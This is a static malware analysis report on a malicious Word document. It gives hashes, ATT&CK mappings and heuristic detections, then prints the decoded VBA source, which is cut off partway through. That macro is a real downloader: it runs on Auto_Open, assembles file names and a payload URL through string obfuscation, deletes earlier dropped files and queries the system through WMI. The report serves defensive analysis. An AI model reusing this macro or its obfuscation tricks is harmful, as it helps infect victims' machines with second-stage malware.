Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8f269a1966e5bc3…

MALICIOUS

Office (OLE)

Size: 71.0 KB
Created: 2015-02-17 08:36:00
Authoring application: Microsoft Office Word
First seen: 2016-04-08
MD5: 22dd3265ae547efa47338ac53281f863
SHA-1: cb4864d35b7d68ef5d9bdafbf62cab3c3180acb1
SHA-256: c8f269a1966e5bc3481c6ef50d7d7213dee4a0773960e7e76e2c02d1f5c0075d
Risk Score: 430

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains critical heuristic firings indicating the presence of VBA macros with auto-execution functions (AutoOpen, Auto_Open) and a Shell() call. The script obfuscates the WScript.Shell object and attempts to construct a URL for downloading a payload. The primary intent appears to be downloading and executing a second-stage payload from the constructed URL.

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18082 bytes
SHA-256: e1f81284458bee6a7319610491030a72f9bad0db47e0b5939298fd0d940ba9a5

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()

    
     UEGHYFWEFYSDGFYQGHJBAHDBSMANDV = "j23gh hj43ghj4g2 hj3g432hyg hg4 2jh3g4h23 g4jhgh4j 2hjg 4hg23jh4g h23g4j h2g4h 2j3g2jhg4h2jghjagd sjahg"
     USER = Module1.Travel("userna" + Chr(109) + Chr(Asc("e")))
     ds = Sgn(44) + 97 + Sgn(5) + Sgn(98) + Sgn(902) + Sgn(-5)
     jks = ds
     PST2 = "" + "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & _
     "a" & "te" + ""
     VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
     VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
     BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""
     
     PST1 = "" + PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1" + ""
     VBT1 = "" + VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
     VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
     KSHUQ = "ht" + "tp://savepic.su/5050397" + "." + "jpg"
     
     STT = "" + "44" + "4." + "pn" + "g" + ""
     
     BART = "" + BART2 + Chr(Abs(ds - 100 - 45 - Sgn(5))) + Chr(Abs(ds - 100 - 96 - 2)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(Abs(ds - 100 - 15 - 1)))) + ""
     
     JSIQOJQ = Chr(Abs(ds - 100 - 46)) + Chr(Abs(ds - 100 - 98)) + Chr(Asc(Chr(Abs(ds / 2 + 47)))) + Chr(Asc(Chr(ds + Fix(16.2)))) + "" & ""
          
          
     KJHDU = BART2 + JSIQOJQ
     BART = KJHDU
     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + "Data\Lo" + "cal\T" + "emp\" + PST1 + "" & ""
     
        STAT = "" + "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + "Data\Lo" + "cal\T" + "emp\" + STT + "" & ""
     ASDASDSA = "" + "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + "" & ""
     MY_FILDIR = "c:\Users\" + USER + "\App" + "Data\Lo" + "cal\T" + "emp\" + VBT1 + ""
     
     
     XPFILEDIR = ""
     HJUTTT = VBTXP
     XPFILEDIR = "" + "c" & ":\W" & "indows\T" & "emp\" + HJUTTT
     UHFD = "" & "c" & ":\W" & "indows\T" & "emp\"
     TRT = UHFD + BART
     KRT = TRT
     HYF = KRT
     
     KJSAHDFFFJ = MY_FILDIR
     
     
     
     
     If (Len(Dir(MY_FILENDIR)) <> 0) Then
      SetAttr MY_FILENDIR, vbNormal
      Kill MY_FILENDIR
     End If
     
     If (Dir(ASDASDSA) <> "") Then
      SetAttr ASDASDSA, vbNormal
      Kill ASDASDSA
     End If
     
     
     If (Dir(MY_FILDIR) <> "") Then
      SetAttr MY_FILDIR, vbNormal
      Kill KJSAHDFFFJ
     End If
     
     
     If (Dir(STAT) <> "") Then
      SetAttr STAT, vbNormal
      Kill STAT
     End If
     
     
     If (Dir(XPFILEDIR) <> "") Then
      SetAttr XPFILEDIR, vbNormal
      Kill XPFILEDIR
     End If
      
     Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
    
     Dim retVal As Variant
     
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile
     FileNukk = FreeFile
     
     FileNs = FreeFile
     Kasdwq = FreeFile
     FileNuG = FreeFile
     
    Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    SETL = "colOperatingSystemsKSAHDIUOQWdsad asad32k r8929h2f uigt8y yr2u3gby2g yu dg2uyg3bdu "
    
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
    Next
     
    Set objWMIService = GetObject("winmgmts:{impersonationLevel
... (truncated)